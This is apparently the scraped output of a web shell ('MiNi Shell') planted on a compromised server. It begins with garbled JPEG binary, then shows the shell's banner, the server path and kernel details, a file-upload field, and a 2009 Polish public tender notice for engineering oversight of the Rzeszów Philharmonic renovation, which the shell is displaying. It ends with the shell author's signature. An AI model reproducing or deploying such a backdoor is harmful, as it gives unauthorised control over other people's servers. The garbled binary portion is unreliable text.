JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090224/39752-N-2009.html

<p class="kh_header"><b>Rzeszów: Pełnienie funkcji Inżyniera Kontraktu dla inwestycji: Rozbudowa przebudowa i remont budynku Filharmonii im. A. Malawskiego w Rzeszowie</b><br>
<b>Numer ogłoszenia: 39752 - 2009; data zamieszczenia: 24.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Filharmonia im. Artura Malawskiego , ul. Chopina 30, 35-959 Rzeszów, woj. podkarpackie, tel. 017 8628408, faks 017 8622333.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.filharmonia.rzeszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inżyniera Kontraktu dla inwestycji: Rozbudowa przebudowa i remont budynku Filharmonii im. A. Malawskiego w Rzeszowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie przez Wykonawcę obowiązków Inżyniera Kontraktu inwestycji pn. Rozbudowa przebudowa i remont budynku Filharmonii im.  A Malawskiego w Rzeszowie, w tym przygotowanie do realizacji zadania, kompleksowej obsługi w zakresie wielobranżowego nadzoru inwestorskiego oraz rozliczania inwestycji w ramach realizacji Projektu unijnego pn.: Rozbudowa przebudowa i remont budynku Filharmonii im. A Malawskiego w Rzeszowie, współfinansowanego ze środków Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013 oraz Wieloletniego Programu Inwestycyjnego Województwa Podkarpackiego na lata 2007-2015; przez osoby o odpowiednich kwalifikacjach zawodowych wymaganych przez Zamawiającego oraz obowiązujące przepisy prawa i z przypisanymi im zakresami obowiązków  odpowiedzialności..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.50.00.00-3, 71.60.00.00-4, 71.30.00.00-1, 72.20.00.00-7, 79.40.00.00-8, 79.20.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 20 000 zł (słownie: dwadzieścia tysięcy złotych) przed upływem terminu składania ofert<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają następujące warunki:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia: 
3)	w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie pełnił funkcję Inżyniera Kontraktu (Inwestora Zastępczego) w ramach budowy obiektów budowlanych w minimum trzech inwestycjach,  w tym co najmniej jedna                o wartości całkowitej inwestycji nie mniejszej niż 20 mln zł netto. Wymaga się, aby każde ze realizowanych inwestycji (usług polegających na pełnieniu funkcji Inwestora Zastępczego) obejmowały branżę: konstrukcyjno-budowlaną, sanitarną, elektryczną                  i drogową  każda. Dodatkowo należyte i nie budzące zastrzeżeń wykonywanie każdej usługi musi być potwierdzone dokumentami potwierdzającymi, np. referencje, protokoły odbioru końcowego, opinie zamawiających.

4)	dysponują osobami mającymi  pełnić funkcję: 
		Inspektor nadzoru inwestorskiego branży konstrukcyjno-budowlanej 
posiadający uprawnienia budowlane do nadzorowania (kierowania) robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej z co najmniej 10 letnim doświadczeniem w nadzorowaniu (kierowaniu) robotami budowlanymi (liczone od dnia uzyskania uprawnień), w tym w realizacji roboty konstrukcyjno-budowlanej polegającej na budowie i wzmacnianiu konstrukcji stalowej, oraz w nadzorowaniu:
- co najmniej 5 realizacji robót konstrukcyjno-budowlanych z ostatnich 3 lat, w tym co  najmniej 1 o wartości min 20 mln zł;
Inspektor nadzoru inwestorskiego branży sanitarnej 
posiadający uprawnienia budowlane do nadzorowania (kierowania) robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji                     i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (sanitarnych), z co najmniej 7 letnim doświadczeniem w  nadzorowaniu (kierowaniu) robotami branży sanitarnej  w obiektach kubaturowych (liczone od dnia uzyskania uprawnień), w tym w nadzorowaniu:
- co najmniej 3 robót budowlanych z ostatnich 3 lat, polegających na wykonaniu instalacji sanitarnych klimatyzacji i wentylacji mechanicznej, w tym min 1 instalacji wentylacji mechanicznej o wydajności min 25 000 m3/;   

Inspektor nadzoru inwestorskiego branży elektrycznej 
posiadający uprawnienia budowlane do nadzorowania (kierowania) robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie instalacji                       i urządzeń elektrycznych, z co najmniej 7 letnim doświadczeniem  w  nadzorowaniu (kierowaniu) robotami branży elektrycznej (liczone od dnia uzyskania uprawnień),                w tym w nadzorowaniu:
- co najmniej 5 robót budowlanych z ostatnich 3 lat polegających na wykonaniu instalacji elektrycznych, słaboprądowych, teletechnicznych w tym min. 1 w obiektach kubaturowych; 

Inspektor nadzoru inwestorskiego branży drogowej 
posiadający uprawnienia budowlane do nadzorowania (kierowania) robotami budowlanymi bez ograniczeń w specjalności drogowej, z co najmniej 7 letnim doświadczeniem w  nadzorowaniu (kierowaniu) robotami branży drogowej (liczone od dnia uzyskania uprawnień), w tym w nadzorowaniu :
- co najmniej 5 robót budowlanych w okresie ostatnich 3 lat polegających na budowie/przebudowie parkingów lub placów postojowych  i dróg manewrowych,                   w tym min. 1 parking lub placu manewrowego o powierzchni nie mniejszej niż 2500 m2;

Projektant Architekt 
posiadający uprawnienia budowlane do projektowania bez ograniczeń w specjalności architektonicznej, z co najmniej 7 letnim doświadczeniem w projektowaniu obiektów kubaturowych (liczone od dnia uzyskania uprawnień), w tym w projektowaniu:
- co najmniej jednego obiektu posiadającego salę koncertową;

		Koordynator Nadzoru Inwestorskiego
posiadający uprawnienia budowlane z co najmniej 10 letnim doświadczeniem                               w nadzorowaniu (kierowaniu) robotami budowlanymi (liczone od dnia uzyskania uprawnień), w tym w koordynowaniu:
- co najmniej 3 pracami inwestycyjnymi w okresie ostatnich 3 lat w tym co najmniej jednej o wartości całkowitej inwestycji min. 20 mln zł.

UWAGA: 
W/w osoby  muszą posiadać aktualny wpis na listę członków właściwej izby samorządu zawodowego. Dopuszcza się łączenie kilku funkcji przez jedną osobę                     w przypadku posiadania kilku rodzajów uprawnień lub kwalifikacji (dotyczy osób z pkt. IV.2.b).
c) dysponują co najmniej po 1 osobie:

Ekspert ds. napędów i sterowania  
posiadający co najmniej 8 letnie  doświadczenie (licząc od daty uzyskania dyplomu studiów wyższych w danej dziedzinie), w tym będący autorem:
- co najmniej 3 prac projektowych wraz nadzorem nad realizacją i uruchomieniem napędów hydraulicznych i sterowania lub publikacji naukowych w zakresie napędów hydraulicznych i sterowania;

Ekspert ds. akustyki dźwięku 
posiadający co najmniej 8 letnie doświadczenie (licząc od daty uzyskania dyplomu studiów wyższych w danej dziedzinie), w tym będący autorem:
- co najmniej 3 prac projektowych lub publikacji naukowych w zakresie akustyki;

Ekspert ds. nagłośnienia, oświetlenia i projekcji multimedialnej posiadający co najmniej 5 letnie doświadczenie (licząc od daty uzyskania dyplomu studiów wyższych                w danej dziedzinie) w tym realizował bądź nadzorował  co najmniej 5 dostaw  sprzętu nagłośnienia, oświetlenia scenicznego i projekcji multimedialnej.
d) dysponują co najmniej  2 osobami (lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia  osób) :   

Ekspert ds. zarządzania projektami 
współfinansowanymi z funduszy UE w zakresie finansów, 
posiadający wyższe wykształcenie oraz co najmniej 8 letnie doświadczenie w zakresie zarządzania projektami unijnymi a w tym:

- zarządzał lub był członkiem zespołu zarządzającego  co najmniej  3 projektami współfinansowanymi z funduszy UE, w tym co najmniej 1 projektu współfinansowanego      z EFRR, gdzie nadzorował lub przygotowywał:  raporty, harmonogramy, wnioski                       o płatność, dokumenty związane z promocją.
- uczestniczył jako ekspert w realizacji co najmniej dwóch zamówień polegających na dostarczeniu wiedzy w formie doradztwa, szkoleń lub publikacji dotyczących finansowania projektów inwestycyjnych w ramach perspektywy finansowej                          2007-2013.

3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - posiadają polisę od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę min. 500.000 zł (pięćset tysiące złotych). 

5)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków, o których mowa w ust. 1, Wykonawca ma obowiązek złożyć następujące dokumenty:

1)	wypełnione i podpisane oświadczenie o spełnianiu warunków udziału 
w postępowaniu, stanowiące załącznik nr 2 do SIWZ.

2)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie 
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

3) wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed dniem wszczęcia postępowania,                    a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej                      3 usług, o których mowa w pkt. IV ust. 1 pkt 2 lit. a), z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, sporządzony według wzoru, który stanowi załącznik nr 3 do SIWZ, wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane należycie. W przypadku dokumentów zawierających wartości w walucie innej niż PLN, zamawiający przeliczy te wartości na PLN wg średniego kursu NBP danej waluty z dnia ogłoszenia niniejszego postępowania.

4) wypełniony zgodnie ze wzorem, stanowiącym załącznik nr 4 do SIWZ, wykaz osób którymi dysponuje lub będzie dysponować Wykonawca w wykonywaniu zamówienia oraz ich życiorysy zawodowe, przygotowane zgodnie ze wzorami stanowiącymi załączniki nr 5 do SIWZ lub pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. Poza tym musi dołączyć uprawnienia budowlane osób, które będą realizować zamówienie tj. do projektowania bez ograniczeń w specjalności architektonicznej; do nadzorowania (kierowania) robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej; do nadzorowania (kierowania) robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (sanitarnych); do nadzorowania (kierowania) robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych, do nadzorowania (kierowania) robotami budowlanymi bez ograniczeń w specjalności drogowej. Wyżej wymienione uprawnienia należy dołączyć z aktualnymi wpisami na listę członków właściwej izby samorządu zawodowego

5)	kopię polisy OC od prowadzonej działalności gospodarczej

6)	jeżeli Wykonawca wskazał osoby udostępnione przez inne podmioty, Wykonawca zobowiązany jest załączyć pisemne zobowiązanie tych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.

7)	aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

8)	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

9)	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.filharmonia.rzeszow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Filharmonia im. A. Malawskiego w Rzeszowie
ul. Szopena 30, Rzeszów
 tel 017 862 84 08
faks 017  862 23 33.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2009 godzina 08:10, miejsce: Filharmonia im. A. Malawskiego w Rzeszowie
ul. Szopena 30, Rzeszów - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com